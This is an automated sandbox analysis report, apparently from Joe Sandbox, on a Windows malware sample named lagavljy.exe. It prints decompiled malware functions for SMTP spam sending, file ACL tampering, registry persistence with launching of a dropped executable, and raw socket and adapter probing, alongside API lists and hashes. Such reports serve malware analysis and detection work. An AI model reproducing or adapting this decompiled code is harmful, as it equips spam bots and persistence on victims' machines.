wsprintfA.USER32 ref: 0040A8AF
send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
wsprintfA.USER32 ref: 0040A8E2
recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
wsprintfA.USER32 ref: 0040A9B9

Strings

AUTH LOGIN, xrefs: 0040A80C
ESMTP, xrefs: 0040AA38
rcpt to:<%s>, xrefs: 0040A855
Incorrect respons, xrefs: 0040AB39
Too big smtp respons (%d bytes), xrefs: 0040A9B1
data, xrefs: 0040A85E
Too small respons, xrefs: 0040A9C9
quit, xrefs: 0040A86C
., xrefs: 0040A8CA
localcfg, xrefs: 0040AB0B
helo %s, xrefs: 0040A803
mail from:<%s>, xrefs: 0040A848
Error sending command (sent = %d/%d), xrefs: 0040A8A7, 0040A8DA
ehlo %s, xrefs: 0040A7F5

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: wsprintf$send$lstrlenrecv
String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
API String ID: 3650048968-2394369944
Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407809, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040782F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
GetLengthSid.ADVAPI32(?), ref: 00407878
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
LocalFree.KERNEL32(00000000), ref: 00407917
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
GetAce.ADVAPI32(?,00000000,?), ref: 00407963
EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
LocalFree.KERNEL32(00000000), ref: 00407A87

Strings

D, xrefs: 0040785C

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00477A59, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00477A7F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00477AB6
GetLengthSid.ADVAPI32(?), ref: 00477AC8
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 00477AEA
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00477B08
EqualSid.ADVAPI32(?,?), ref: 00477B22
LocalAlloc.KERNEL32(00000040,00000014), ref: 00477B33
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00477B41
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00477B51
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00477B60
LocalFree.KERNEL32(00000000), ref: 00477B67
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00477B83
GetAce.ADVAPI32(?,?,?), ref: 00477BB3
EqualSid.ADVAPI32(?,?), ref: 00477BDA
DeleteAce.ADVAPI32(?,?), ref: 00477BF3
EqualSid.ADVAPI32(?,?), ref: 00477C15
LocalAlloc.KERNEL32(00000040,00000014), ref: 00477C9A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00477CA8
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00477CB9
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00477CC9
LocalFree.KERNEL32(00000000), ref: 00477CD7

Strings

D, xrefs: 00477AAC

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: c2c428b40189210143ecfb925ccf67f3ff6645a853cacca21565d9b1fcfcb382
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: F8815071D04109AFDB12CFA4DD84FEFBBB8AF08344F54C06AE509E6250D7799A41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00408328, Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A

Strings

localcfg, xrefs: 00408348
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 004085C8, 004085D5, 004085E5

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe$localcfg
API String ID: 237177642-4179292358
Opcode ID: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
Opcode Fuzzy Hash: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402A62, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 194
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

APIs

GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,73B74F20), ref: 00402A83
HeapAlloc.KERNEL32(00000000,?,73B74F20), ref: 00402A86
socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
htons.WS2_32(00000000), ref: 00402ADB
select.WS2_32 ref: 00402B28
recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
htons.WS2_32(?), ref: 00402B71
htons.WS2_32(?), ref: 00402B8C
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB

Strings

ps, xrefs: 00402CC7

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heaphtons$Process$Allocrecvselectsocket
String ID: ps
API String ID: 1639031587-3878219058
Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 106
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

APIs

inet_addr.WS2_32(123.45.67.89), ref: 004019B1
LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4

Strings

localcfg, xrefs: 004019A3
GetAdaptersInfo, xrefs: 004019DC
Iphlpapi.dll, xrefs: 004019B7
123.45.67.89, xrefs: 004019A6
GetBestInterface, xrefs: 004019EF
~s`ysps, xrefs: 004019B1
GetIfEntry, xrefs: 004019E4

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg$~s`ysps
API String ID: 835516345-819159683
Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
